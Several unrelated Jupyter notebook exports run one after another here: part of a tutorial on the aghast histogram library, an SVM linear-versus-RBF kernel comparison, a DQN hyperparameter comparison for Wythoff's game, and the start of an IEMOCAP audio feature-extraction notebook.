aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")])])),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(
numpy.concatenate([
numpy.histogram(xdata, bins=10, range=(-5, 5))[0],
numpy.histogram(xdata + sigma, bins=10, range=(-5, 5))[0]]))))
df = aghast.connect.pandas.topandas(h)
df
df.unstack(level=0)
```
## Collections
You can gather many objects (histograms, functions, ntuples) into a `Collection`, partly for convenience of encapsulating all of them in one object.
```
aghast.Collection({"one": fromroot, "two": ghastly_hist}).dump()
```
Not only for convenience: [you can also define](https://github.com/diana-hep/aghast/blob/master/specification.adoc#Collection) an `Axis` in the `Collection` to subdivide all contents by that `Axis`. For instance, you can make a collection of qualitatively different histograms all have a signal and control region with `PredicateBinning`, or all have systematic variations with `VariationBinning`.
It is not necessary to rely on naming conventions to communicate this information from filler to fitter.
## Histogram โ histogram conversions
I said in the introduction that aghast does not fill histograms and does not plot histogramsโthe two things data analysts are expecting to do. These would be done by user-facing libraries.
Aghast does, however, transform histograms into other histograms, and not just among formats. You can combine histograms with `+`. In addition to adding histogram counts, it combines auxiliary statistics appropriately (if possible).
```
h1 = aghast.Histogram([
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)),
statistics=[aghast.Statistics(
moments=[
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([10])), n=1),
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([20])), n=2)],
quantiles=[
aghast.Quantiles(aghast.InterpretedInlineBuffer.fromarray(numpy.array([30])), p=0.5)],
mode=aghast.Modes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([40]))),
min=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([50]))),
max=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([60]))))])],
aghast.UnweightedCounts(aghast.InterpretedInlineBuffer.fromarray(numpy.arange(10))))
h2 = aghast.Histogram([
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)),
statistics=[aghast.Statistics(
moments=[
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([100])), n=1),
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([200])), n=2)],
quantiles=[
aghast.Quantiles(aghast.InterpretedInlineBuffer.fromarray(numpy.array([300])), p=0.5)],
mode=aghast.Modes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([400]))),
min=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([500]))),
max=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([600]))))])],
aghast.UnweightedCounts(aghast.InterpretedInlineBuffer.fromarray(numpy.arange(100, 200, 10))))
(h1 + h2).dump()
```
The corresponding moments of `h1` and `h2` were matched and added, quantiles and modes were dropped (no way to combine them), and the correct minimum and maximum were picked; the histogram contents were added as well.
Another important histogram โ histogram conversion is axis-reduction, which can take three forms:
* slicing an axis, either dropping the eliminated bins or adding them to underflow/overflow (if possible, depends on binning type);
* rebinning by combining neighboring bins;
* projecting out an axis, removing it entirely, summing over all existing bins.
All of these operations use a Pandas-inspired `loc`/`iloc` syntax.
```
h = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(numpy.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90]))))
```
`loc` slices in the data's coordinate system. `1.5` rounds up to bin index `6`. The first five bins get combined into an overflow bin: `150 = 10 + 20 + 30 + 40 + 50`.
```
h.loc[1.5:].dump()
```
`iloc` slices by bin index number.
```
h.iloc[6:].dump()
```
Slices have a `start`, `stop`, and `step` (`start:stop:step`). The `step` parameter rebins:
```
h.iloc[::2].dump()
```
Thus, you can slice and rebin as part of the same operation.
Projecting uses the same mechanism, except that `None` passed as an axis's slice projects it.
```
h2 = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5))),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(numpy.arange(100))))
h2.iloc[:, None].dump()
```
Thus, all three axis reduction operations can be performed in a single syntax.
In general, an n-dimensional ghastly histogram can be sliced like an n-dimensional Numpy array. This includes integer and boolean indexing (though that necessarily changes the binning to `IrregularBinning`).
```
h.iloc[[4, 3, 6, 7, 1]].dump()
h.iloc[[True, False, True, False, True, False, True, False, True, False]].dump()
```
`loc` for numerical binnings accepts
* a real number
* a real-valued slice
* `None` for projection
* ellipsis (`...`)
`loc` for categorical binnings accepts
* a string
* an iterable of strings
* an _empty_ slice
* `None` for projection
* ellipsis (`...`)
`iloc` accepts
* an integer
* an integer-valued slice
* `None` for projection
* integer-valued array-like
* boolean-valued array-like
* ellipsis (`...`)
## Bin counts โ Numpy
Frequently, one wants to extract bin counts from a histogram. The `loc`/`iloc` syntax above creates _histograms_ from _histograms_, not bin counts.
A histogram's `counts` property has a slice syntax.
```
allcounts = numpy.arange(12) * numpy.arange(12)[:, None] # multiplication table
allcounts[10, :] = -999 # underflows
allcounts[11, :] = 999 # overflows
allcounts[:, 0] = -999 # underflows
allcounts[:, 1] = 999 # overflows
print(allcounts)
h2 = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5),
aghast.RealOverflow(loc_underflow=aghast.RealOverflow.above1,
loc_overflow=aghast.RealOverflow.above2))),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5),
aghast.RealOverflow(loc_underflow=aghast.RealOverflow.below2,
loc_overflow=aghast.RealOverflow.below1)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(allcounts)))
print(h2.counts[:, :])
```
To get the underflows and overflows, set the slice extremes to `-inf` and `+inf`.
```
print(h2.counts[-numpy.inf:numpy.inf, :])
print(h2.counts[:, -numpy.inf:numpy.inf])
```
Also note that the underflows are now all below the normal bins and overflows are now all above the normal bins, regardless of how they were arranged in the ghast. This allows analysis code to be independent of histogram source.
# Other types
Aghast can attach fit functions to histograms, can store standalone functions, such as lookup tables, and can store ntuples for unweighted fits or machine learning.
|
github_jupyter
|
import numpy
numpy_hist = numpy.histogram(numpy.random.normal(0, 1, int(10e6)), bins=80, range=(-5, 5))
numpy_hist
import aghast.connect.numpy
ghastly_hist = aghast.connect.numpy.fromnumpy(numpy_hist)
ghastly_hist
ghastly_hist.dump()
import aghast.connect.root
root_hist = aghast.connect.root.toroot(ghastly_hist, "root_hist")
root_hist
import ROOT
canvas = ROOT.TCanvas()
root_hist.Draw()
canvas.Draw()
import aghast.connect.pandas
pandas_hist = aghast.connect.pandas.topandas(ghastly_hist)
pandas_hist
ghastly_hist.tobuffer()
print("Numpy size: ", numpy_hist[0].nbytes + numpy_hist[1].nbytes)
tmessage = ROOT.TMessage()
tmessage.WriteObject(root_hist)
print("ROOT size: ", tmessage.Length())
import pickle
print("Pandas size:", len(pickle.dumps(pandas_hist)))
print("Aghast size: ", len(ghastly_hist.tobuffer()))
fromroot = aghast.connect.root.fromroot(root_hist)
fromroot.axis[0].binning.dump()
print("Bin contents length:", len(fromroot.counts.array))
ghastly_hist.axis[0].binning.dump()
print("Bin contents length:", len(ghastly_hist.counts.array))
sum_hist = fromroot + ghastly_hist
sum_hist.axis[0].binning.dump()
print("Bin contents length:", len(sum_hist.counts.array))
import aghast
aghast.IntegerBinning(5, 10).dump()
aghast.RegularBinning(100, aghast.RealInterval(-5, 5)).dump()
aghast.HexagonalBinning(0, 100, 0, 100, aghast.HexagonalBinning.cube_xy).dump()
aghast.EdgesBinning([0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]).dump()
aghast.IrregularBinning([aghast.RealInterval(0, 5),
aghast.RealInterval(10, 100),
aghast.RealInterval(-10, 10)],
overlapping_fill=aghast.IrregularBinning.all).dump()
aghast.CategoryBinning(["one", "two", "three"]).dump()
aghast.SparseRegularBinning([5, 3, -2, 8, -100], 10).dump()
aghast.FractionBinning(error_method=aghast.FractionBinning.clopper_pearson).dump()
aghast.PredicateBinning(["signal region", "control region"]).dump()
aghast.VariationBinning([aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")]),
aghast.Variation([aghast.Assignment("x", "nominal - sigma")])]).dump()
aghast.IntegerBinning(5, 10).toCategoryBinning().dump()
aghast.RegularBinning(10, aghast.RealInterval(-5, 5)).toCategoryBinning().dump()
aghast.EdgesBinning([0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]).toCategoryBinning().dump()
aghast.IrregularBinning([aghast.RealInterval(0, 5),
aghast.RealInterval(10, 100),
aghast.RealInterval(-10, 10)],
overlapping_fill=aghast.IrregularBinning.all).toCategoryBinning().dump()
aghast.SparseRegularBinning([5, 3, -2, 8, -100], 10).toCategoryBinning().dump()
aghast.FractionBinning(error_method=aghast.FractionBinning.clopper_pearson).toCategoryBinning().dump()
aghast.PredicateBinning(["signal region", "control region"]).toCategoryBinning().dump()
aghast.VariationBinning([aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")]),
aghast.Variation([aghast.Assignment("x", "nominal - sigma")])]).toCategoryBinning().dump()
aghast.RegularBinning(5, aghast.RealInterval(-5, 5), aghast.RealOverflow(
loc_underflow=aghast.BinLocation.above2,
loc_overflow=aghast.BinLocation.above1,
loc_nanflow=aghast.BinLocation.below1
)).toCategoryBinning().dump()
h = aghast.Histogram([aghast.Axis(aghast.FractionBinning()),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(
numpy.array([[ 9, 25, 29, 35, 54, 67, 60, 84, 80, 94],
[ 99, 119, 109, 109, 95, 104, 102, 106, 112, 122]]))))
df = aghast.connect.pandas.topandas(h)
df
df = df.unstack(level=0)
df
df["unweighted", "pass"] / df["unweighted", "all"]
xdata = numpy.random.normal(0, 1, int(1e6))
sigma = numpy.random.uniform(-0.1, 0.8, int(1e6))
h = aghast.Histogram([aghast.Axis(aghast.VariationBinning([
aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")])])),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(
numpy.concatenate([
numpy.histogram(xdata, bins=10, range=(-5, 5))[0],
numpy.histogram(xdata + sigma, bins=10, range=(-5, 5))[0]]))))
df = aghast.connect.pandas.topandas(h)
df
df.unstack(level=0)
aghast.Collection({"one": fromroot, "two": ghastly_hist}).dump()
h1 = aghast.Histogram([
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)),
statistics=[aghast.Statistics(
moments=[
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([10])), n=1),
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([20])), n=2)],
quantiles=[
aghast.Quantiles(aghast.InterpretedInlineBuffer.fromarray(numpy.array([30])), p=0.5)],
mode=aghast.Modes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([40]))),
min=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([50]))),
max=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([60]))))])],
aghast.UnweightedCounts(aghast.InterpretedInlineBuffer.fromarray(numpy.arange(10))))
h2 = aghast.Histogram([
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)),
statistics=[aghast.Statistics(
moments=[
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([100])), n=1),
aghast.Moments(aghast.InterpretedInlineBuffer.fromarray(numpy.array([200])), n=2)],
quantiles=[
aghast.Quantiles(aghast.InterpretedInlineBuffer.fromarray(numpy.array([300])), p=0.5)],
mode=aghast.Modes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([400]))),
min=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([500]))),
max=aghast.Extremes(aghast.InterpretedInlineBuffer.fromarray(numpy.array([600]))))])],
aghast.UnweightedCounts(aghast.InterpretedInlineBuffer.fromarray(numpy.arange(100, 200, 10))))
(h1 + h2).dump()
h = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(numpy.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90]))))
h.loc[1.5:].dump()
h.iloc[6:].dump()
h.iloc[::2].dump()
h2 = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5))),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(numpy.arange(100))))
h2.iloc[:, None].dump()
h.iloc[[4, 3, 6, 7, 1]].dump()
h.iloc[[True, False, True, False, True, False, True, False, True, False]].dump()
allcounts = numpy.arange(12) * numpy.arange(12)[:, None] # multiplication table
allcounts[10, :] = -999 # underflows
allcounts[11, :] = 999 # overflows
allcounts[:, 0] = -999 # underflows
allcounts[:, 1] = 999 # overflows
print(allcounts)
h2 = aghast.Histogram(
[aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5),
aghast.RealOverflow(loc_underflow=aghast.RealOverflow.above1,
loc_overflow=aghast.RealOverflow.above2))),
aghast.Axis(aghast.RegularBinning(10, aghast.RealInterval(-5, 5),
aghast.RealOverflow(loc_underflow=aghast.RealOverflow.below2,
loc_overflow=aghast.RealOverflow.below1)))],
aghast.UnweightedCounts(
aghast.InterpretedInlineBuffer.fromarray(allcounts)))
print(h2.counts[:, :])
print(h2.counts[-numpy.inf:numpy.inf, :])
print(h2.counts[:, -numpy.inf:numpy.inf])
| 0.323808 | 0.943712 |
### Preprocessing
```
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
X = np.random.normal(size=100)
X1 = X[0:50]
X2 = X[51:100]
y = 2 * pow(X,2) + 3.5 + np.random.normal(size=100)
y1 = y[0:50]
y2 = y[51:100]
y1 += 3.7
y2 -= 3.7
plt.xkcd()
plt.figure(figsize=(25, 10))
plt.scatter(X1, y1, cmap=mpl.cm.Paired, marker='o', s=500)
plt.scatter(X2, y2, cmap=mpl.cm.Paired, marker='o', s=500)
plt.xlabel('X', color='green', fontsize=20)
plt.ylabel('y', color='orange', fontsize=20)
plt.title('data with visible but non-linear separation', color='m', fontsize=30)
```
### Support vector machine with a non-linear kernel
```
Z = y = np.concatenate([1*np.ones((50,)), -1*np.zeros((50,))])
X_train, X_test, Z_train, Z_test = train_test_split(X, Z, test_size=0.5, random_state=42)
svmfit = SVC(C=40, kernel='rbf', gamma=1).fit(X_train.reshape(-1, 1), Z_train)
svmfit.support_
from sklearn.metrics import confusion_matrix, classification_report
conf_mat_train = pd.DataFrame(confusion_matrix(Z_train, svmfit.predict(X_train.reshape(-1,1))).T, index = svmfit.classes_, columns = svmfit.classes_)
conf_mat_train
class_mat_train = classification_report(Z_train, svmfit.predict(X_train.reshape(-1, 1)))
print(class_mat_train)
conf_mat_test = pd.DataFrame(confusion_matrix(Z_test, svmfit.predict(X_test.reshape(-1,1))).T, index = svmfit.classes_, columns = svmfit.classes_)
conf_mat_test
class_mat_test = classification_report(Z_test, svmfit.predict(X_test.reshape(-1, 1)))
print(class_mat_test)
```
### Support vector classifier (linear kernel)
```
svmfit_linear = SVC(kernel='linear', C=40).fit(X_train.reshape(-1, 1), Z_train)
conf_mat_linear_train = pd.DataFrame(confusion_matrix(Z_train, svmfit_linear.predict(X_train.reshape(-1,1))).T, index = svmfit_linear.classes_, columns = svmfit.classes_)
conf_mat_linear_train
class_mat_linear_train = classification_report(Z_train, svmfit_linear.predict(X_train.reshape(-1, 1)))
print(class_mat_linear_train)
conf_mat_linear_test = pd.DataFrame(confusion_matrix(Z_test, svmfit_linear.predict(X_test.reshape(-1,1))).T, index = svmfit_linear.classes_, columns = svmfit.classes_)
conf_mat_linear_test
class_mat_linear_test = classification_report(Z_test, svmfit_linear.predict(X_test.reshape(-1, 1)))
print(class_mat_linear_test)
```
**Therefore, there is no difference between the performance of a linear and non-linear kernel on training data. But, non-linear kernel outperforms linear kernel on test data.**
|
github_jupyter
|
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
X = np.random.normal(size=100)
X1 = X[0:50]
X2 = X[51:100]
y = 2 * pow(X,2) + 3.5 + np.random.normal(size=100)
y1 = y[0:50]
y2 = y[51:100]
y1 += 3.7
y2 -= 3.7
plt.xkcd()
plt.figure(figsize=(25, 10))
plt.scatter(X1, y1, cmap=mpl.cm.Paired, marker='o', s=500)
plt.scatter(X2, y2, cmap=mpl.cm.Paired, marker='o', s=500)
plt.xlabel('X', color='green', fontsize=20)
plt.ylabel('y', color='orange', fontsize=20)
plt.title('data with visible but non-linear separation', color='m', fontsize=30)
Z = y = np.concatenate([1*np.ones((50,)), -1*np.zeros((50,))])
X_train, X_test, Z_train, Z_test = train_test_split(X, Z, test_size=0.5, random_state=42)
svmfit = SVC(C=40, kernel='rbf', gamma=1).fit(X_train.reshape(-1, 1), Z_train)
svmfit.support_
from sklearn.metrics import confusion_matrix, classification_report
conf_mat_train = pd.DataFrame(confusion_matrix(Z_train, svmfit.predict(X_train.reshape(-1,1))).T, index = svmfit.classes_, columns = svmfit.classes_)
conf_mat_train
class_mat_train = classification_report(Z_train, svmfit.predict(X_train.reshape(-1, 1)))
print(class_mat_train)
conf_mat_test = pd.DataFrame(confusion_matrix(Z_test, svmfit.predict(X_test.reshape(-1,1))).T, index = svmfit.classes_, columns = svmfit.classes_)
conf_mat_test
class_mat_test = classification_report(Z_test, svmfit.predict(X_test.reshape(-1, 1)))
print(class_mat_test)
svmfit_linear = SVC(kernel='linear', C=40).fit(X_train.reshape(-1, 1), Z_train)
conf_mat_linear_train = pd.DataFrame(confusion_matrix(Z_train, svmfit_linear.predict(X_train.reshape(-1,1))).T, index = svmfit_linear.classes_, columns = svmfit.classes_)
conf_mat_linear_train
class_mat_linear_train = classification_report(Z_train, svmfit_linear.predict(X_train.reshape(-1, 1)))
print(class_mat_linear_train)
conf_mat_linear_test = pd.DataFrame(confusion_matrix(Z_test, svmfit_linear.predict(X_test.reshape(-1,1))).T, index = svmfit_linear.classes_, columns = svmfit.classes_)
conf_mat_linear_test
class_mat_linear_test = classification_report(Z_test, svmfit_linear.predict(X_test.reshape(-1, 1)))
print(class_mat_linear_test)
| 0.571049 | 0.879871 |
# Analysis - exp62 - 72, or more
- Have run a few tuning experiments for the `(s,a) -> v` representation of wythoffs.
- In this notebook I compare the best of these head to head.
```
import os
import csv
import optuna
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
from torchvision import datasets
from torchvision import transforms
import numpy as np
import pandas as pd
from glob import glob
from pprint import pprint
from copy import deepcopy
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import seaborn as sns
sns.set(font_scale=1.5)
sns.set_style('ticks')
matplotlib.rcParams.update({'font.size': 16})
matplotlib.rc('axes', titlesize=16)
from notebook_helpers import load_params
from notebook_helpers import load_monitored
from notebook_helpers import join_monitored
from notebook_helpers import score_summary
def load_data(path, model, run_index=None):
runs = range(run_index[0], run_index[1]+1)
exps = []
for r in runs:
file = os.path.join(path, f"run_{model}_{r}_monitor.csv".format(int(r)))
try:
mon = load_monitored(file)
except FileNotFoundError:
mon = None
exps.append(mon)
return exps
def load_hp(name):
return pd.read_csv(name, index_col=False)
def find_best(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(data):
if mon is not None:
full = mon[score]
selected = full[window[0]:window[1]]
x = np.mean(selected)
scores.append(x)
else:
scores.append(np.nan)
best = np.nanargmax(scores)
return scores[best], hp[best:best+1]
def find_worst(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(data):
if mon is not None:
full = mon[score]
selected = full[window[0]:window[1]]
x = np.mean(selected)
scores.append(x)
else:
scores.append(np.nan)
best = np.nanargmin(scores)
return scores[worst], hp[best:best+1]
```
# HP
## Grid search
- exp68 as the best.
```
path = "/Users/qualia/Code/azad/data/wythoff/exp68/"
hp = load_hp(os.path.join(path,"grid.csv"))
# Find the best model + hp
models = ["DQN_xy1", "DQN_xy2", "DQN_xy3", "DQN_xy4", "DQN_xy5"]
index = (0, 250)
for model in models:
data = load_data(path, model, run_index=index)
score, best_hp = find_best(hp, data, (200,250))
print(f"{model} - {score}:\n{best_hp}\n---")
```
## Optuna
- exp71 was the best
```
path = "/Users/qualia/Code/azad/data/wythoff/exp71/"
# Load the optuna study object, and extract the interesting bits
study = torch.load(os.path.join(path, "run_0.torch"))
study.trials_dataframe().sort_values("value", ascending=False).head(1)
study.best_value
study.best_params
# Build network for optuna
in_features = 4 # Initial
out_features = [10, 11, 13]
layers = []
for out_feature in out_features:
layers.append(nn.Linear(in_features, out_feature))
layers.append(nn.ReLU())
in_features = deepcopy(out_feature)
# Output layer topo is fixed
layers.append(nn.Linear(in_features, 1))
# Define the nn
class DQN_optuna(nn.Module):
def __init__(self):
super(DQN_optuna, self).__init__()
self.layers = nn.Sequential(*layers)
def forward(self, x):
return self.layers(x)
print(DQN_optuna())
```
# Head2Head
- Compare these two best solutions on the same task and seed.
```
from azad.exp.alternatives import wythoff_dqn2
seed_value = 1387
num_episodes = 2500
game = 'Wythoff15x15'
batch_size = 50
memory_capacity = 1e3
anneal = True
update_every = 10
double = True
clip_grad = True
monitor = ('episode', 'loss', 'score', 'Q', 'prediction_error', 'advantage', 'epsilon_e')
```
### Run
```
# Grid
result1 = wythoff_dqn2(
epsilon=0.1,
gamma=0.4,
learning_rate=0.027755,
network='DQN_xy3',
game=game,
num_episodes=num_episodes,
batch_size=batch_size,
memory_capacity=memory_capacity,
anneal=anneal,
update_every=update_every,
double=double,
clip_grad=clip_grad,
seed=seed_value,
monitor=monitor
)
# Optuna
result2 = wythoff_dqn2(
epsilon=0.33,
gamma=0.27,
learning_rate=0.49,
network=DQN_optuna,
game=game,
num_episodes=num_episodes,
batch_size=batch_size,
memory_capacity=memory_capacity,
anneal=anneal,
update_every=update_every,
double=double,
clip_grad=clip_grad,
seed=seed_value,
monitor=monitor,
)
```
### Visualize
```
# ---
mon = result1["monitored"]
fig, ax1 = plt.subplots(figsize=(8,3))
_ = ax1.plot(mon['episode'], mon['score'], color='red', alpha=1)
_ = plt.title(f"Result 1 - {np.max(mon['score']).round(2)}")
_ = ax1.set_ylabel("Optimal score", color="red")
_ = ax1.set_xlabel("Episode")
_ = ax1.set_ylim(0, 1)
_ = ax2 = ax1.twinx()
_ = ax2.plot(mon['episode'], np.log10(mon['loss']), color='black', alpha=1)
_ = ax2.tick_params(axis='y')
_ = ax2.set_ylabel('log10(loss)', color="black")
sns.despine()
# ---
mon = result2["monitored"]
fig, ax1 = plt.subplots(figsize=(8,3))
_ = ax1.plot(mon['episode'], mon['score'], color='red', alpha=1)
_ = plt.title(f"Result 2 - {np.max(mon['score']).round(2)}")
_ = ax1.set_ylabel("Optimal score", color="red")
_ = ax1.set_xlabel("Episode")
_ = ax1.set_ylim(0, 1)
_ = ax2 = ax1.twinx()
_ = ax2.plot(mon['episode'], np.log10(mon['loss']), color='black', alpha=1)
_ = ax2.tick_params(axis='y')
_ = ax2.set_ylabel('log10(loss)', color="black")
sns.despine()
```
|
github_jupyter
|
import os
import csv
import optuna
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
from torchvision import datasets
from torchvision import transforms
import numpy as np
import pandas as pd
from glob import glob
from pprint import pprint
from copy import deepcopy
import matplotlib
import matplotlib.pyplot as plt
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import seaborn as sns
sns.set(font_scale=1.5)
sns.set_style('ticks')
matplotlib.rcParams.update({'font.size': 16})
matplotlib.rc('axes', titlesize=16)
from notebook_helpers import load_params
from notebook_helpers import load_monitored
from notebook_helpers import join_monitored
from notebook_helpers import score_summary
def load_data(path, model, run_index=None):
runs = range(run_index[0], run_index[1]+1)
exps = []
for r in runs:
file = os.path.join(path, f"run_{model}_{r}_monitor.csv".format(int(r)))
try:
mon = load_monitored(file)
except FileNotFoundError:
mon = None
exps.append(mon)
return exps
def load_hp(name):
return pd.read_csv(name, index_col=False)
def find_best(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(data):
if mon is not None:
full = mon[score]
selected = full[window[0]:window[1]]
x = np.mean(selected)
scores.append(x)
else:
scores.append(np.nan)
best = np.nanargmax(scores)
return scores[best], hp[best:best+1]
def find_worst(hp, data, window, score="score"):
scores = []
for r, mon in enumerate(data):
if mon is not None:
full = mon[score]
selected = full[window[0]:window[1]]
x = np.mean(selected)
scores.append(x)
else:
scores.append(np.nan)
best = np.nanargmin(scores)
return scores[worst], hp[best:best+1]
path = "/Users/qualia/Code/azad/data/wythoff/exp68/"
hp = load_hp(os.path.join(path,"grid.csv"))
# Find the best model + hp
models = ["DQN_xy1", "DQN_xy2", "DQN_xy3", "DQN_xy4", "DQN_xy5"]
index = (0, 250)
for model in models:
data = load_data(path, model, run_index=index)
score, best_hp = find_best(hp, data, (200,250))
print(f"{model} - {score}:\n{best_hp}\n---")
path = "/Users/qualia/Code/azad/data/wythoff/exp71/"
# Load the optuna study object, and extract the interesting bits
study = torch.load(os.path.join(path, "run_0.torch"))
study.trials_dataframe().sort_values("value", ascending=False).head(1)
study.best_value
study.best_params
# Build network for optuna
in_features = 4 # Initial
out_features = [10, 11, 13]
layers = []
for out_feature in out_features:
layers.append(nn.Linear(in_features, out_feature))
layers.append(nn.ReLU())
in_features = deepcopy(out_feature)
# Output layer topo is fixed
layers.append(nn.Linear(in_features, 1))
# Define the nn
class DQN_optuna(nn.Module):
def __init__(self):
super(DQN_optuna, self).__init__()
self.layers = nn.Sequential(*layers)
def forward(self, x):
return self.layers(x)
print(DQN_optuna())
from azad.exp.alternatives import wythoff_dqn2
seed_value = 1387
num_episodes = 2500
game = 'Wythoff15x15'
batch_size = 50
memory_capacity = 1e3
anneal = True
update_every = 10
double = True
clip_grad = True
monitor = ('episode', 'loss', 'score', 'Q', 'prediction_error', 'advantage', 'epsilon_e')
# Grid
result1 = wythoff_dqn2(
epsilon=0.1,
gamma=0.4,
learning_rate=0.027755,
network='DQN_xy3',
game=game,
num_episodes=num_episodes,
batch_size=batch_size,
memory_capacity=memory_capacity,
anneal=anneal,
update_every=update_every,
double=double,
clip_grad=clip_grad,
seed=seed_value,
monitor=monitor
)
# Optuna
result2 = wythoff_dqn2(
epsilon=0.33,
gamma=0.27,
learning_rate=0.49,
network=DQN_optuna,
game=game,
num_episodes=num_episodes,
batch_size=batch_size,
memory_capacity=memory_capacity,
anneal=anneal,
update_every=update_every,
double=double,
clip_grad=clip_grad,
seed=seed_value,
monitor=monitor,
)
# ---
mon = result1["monitored"]
fig, ax1 = plt.subplots(figsize=(8,3))
_ = ax1.plot(mon['episode'], mon['score'], color='red', alpha=1)
_ = plt.title(f"Result 1 - {np.max(mon['score']).round(2)}")
_ = ax1.set_ylabel("Optimal score", color="red")
_ = ax1.set_xlabel("Episode")
_ = ax1.set_ylim(0, 1)
_ = ax2 = ax1.twinx()
_ = ax2.plot(mon['episode'], np.log10(mon['loss']), color='black', alpha=1)
_ = ax2.tick_params(axis='y')
_ = ax2.set_ylabel('log10(loss)', color="black")
sns.despine()
# ---
mon = result2["monitored"]
fig, ax1 = plt.subplots(figsize=(8,3))
_ = ax1.plot(mon['episode'], mon['score'], color='red', alpha=1)
_ = plt.title(f"Result 2 - {np.max(mon['score']).round(2)}")
_ = ax1.set_ylabel("Optimal score", color="red")
_ = ax1.set_xlabel("Episode")
_ = ax1.set_ylim(0, 1)
_ = ax2 = ax1.twinx()
_ = ax2.plot(mon['episode'], np.log10(mon['loss']), color='black', alpha=1)
_ = ax2.tick_params(axis='y')
_ = ax2.set_ylabel('log10(loss)', color="black")
sns.despine()
| 0.809916 | 0.850127 |
This notebook contains code to extract features from the audio signals.
```
import os
import pickle
import soundfile as sf
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.style as ms
from tqdm import tqdm
import librosa
import math
import random
import pandas as pd
import IPython.display
import librosa.display
ms.use('seaborn-muted')
%matplotlib inline
data_dir = r'D:\pre-processed/'
labels_df_path = '{}df_iemocap.csv'.format(data_dir)
audio_vectors_path = '{}audio_vectors_1.pkl'.format(data_dir)
labels_df = pd.read_csv(labels_df_path)
audio_vectors = pickle.load(open(audio_vectors_path, 'rb'))
random_file_name = list(audio_vectors.keys())[random.choice(range(len(audio_vectors.keys())))]
y = audio_vectors[random_file_name]
sr = 44100
plt.figure(figsize=(15,2))
librosa.display.waveplot(y, sr=sr, max_sr=1000, alpha=0.25, color='r')
print('Signal mean = {:.5f}'.format(np.mean(abs(y))))
print('Signal std dev = {:.5f}'.format(np.std(y)))
rmse = librosa.feature.rms(y + 0.0001)[0]
plt.figure(figsize=(15,2))
plt.plot(rmse)
plt.ylabel('RMSE')
